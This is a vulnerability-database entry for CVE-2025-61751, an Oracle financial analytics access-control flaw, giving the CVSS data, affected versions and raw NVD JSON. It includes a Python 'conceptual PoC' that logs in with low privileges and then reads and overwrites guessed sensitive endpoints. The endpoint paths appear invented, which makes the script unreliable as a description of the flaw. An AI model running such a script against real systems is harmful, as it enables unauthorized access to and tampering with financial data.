Security Vulnerability Report
中文
CVE-2025-61751 CVSS 8.1 HIGH

CVE-2025-61751

Published: 2025-10-21 20:20:51
Last Modified: 2025-10-24 14:36:24

Description

Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized access to critical data or complete access to all Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Financial Services Analytical Applications Infrastructure 8.0.7.9
Oracle Financial Services Analytical Applications Infrastructure 8.0.8.7
Oracle Financial Services Analytical Applications Infrastructure 8.1.2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61751 PoC - Oracle Financial Services Analytical Applications Infrastructure Access Control Bypass # Affected versions: 8.0.7.9, 8.0.8.7, 8.1.2.5 # Component: Platform # Note: This is a conceptual PoC demonstrating the access control bypass vulnerability import requests from requests.auth import HTTPBasicAuth # Target configuration TARGET_URL = "https://target-oracle-fsaa-host:port" PLATFORM_ENDPOINT = "/analytics-platform/api/v1/" # Low-privilege attacker credentials (PR:L - low privileges required) ATTACKER_USER = "low_priv_user" ATTACKER_PASS = "attacker_password" def exploit_access_control_bypass(): """ Exploit access control vulnerability in Oracle FSAA Infrastructure Platform. The vulnerability allows low-privileged users to bypass access controls and gain unauthorized access to critical data and operations. """ session = requests.Session() # Step 1: Authenticate with low-privilege credentials auth_url = f"{TARGET_URL}{PLATFORM_ENDPOINT}auth/login" auth_response = session.post( auth_url, json={"username": ATTACKER_USER, "password": ATTACKER_PASS}, verify=False ) print(f"[*] Authentication status: {auth_response.status_code}") # Step 2: Access critical data endpoints that should require higher privileges # The access control flaw allows bypassing permission checks critical_endpoints = [ "sensitive-financial-data", "critical-analytics/reports", "admin/data-management", "platform/configuration" ] for endpoint in critical_endpoints: url = f"{TARGET_URL}{PLATFORM_ENDPOINT}{endpoint}" response = session.get(url, verify=False) if response.status_code == 200: print(f"[+] Unauthorized access to {endpoint}: SUCCESS") # Step 3: Modify critical data (unauthorized CUD operations) modify_response = session.put( url, json={"data": "malicious_payload"}, verify=False ) print(f"[+] Unauthorized modification of {endpoint}: {modify_response.status_code}") return session if __name__ == "__main__": print("[*] CVE-2025-61751 PoC - Oracle FSAA Infrastructure Access Control Bypass") exploit_access_control_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61751", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:51.467", "lastModified": "2025-10-24T14:36:24.463", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Financial Services Analytical Applications Infrastructure accessible data as well as unauthorized access to critical data or complete access to all Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "01413F8D-9A00-4D47-AEFC-B214F24DF7E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "99758374-009C-4AD2-8402-F8F0ACE6B289"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "93333ABD-DCF3-46E6-8053-36B62D7431A3"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}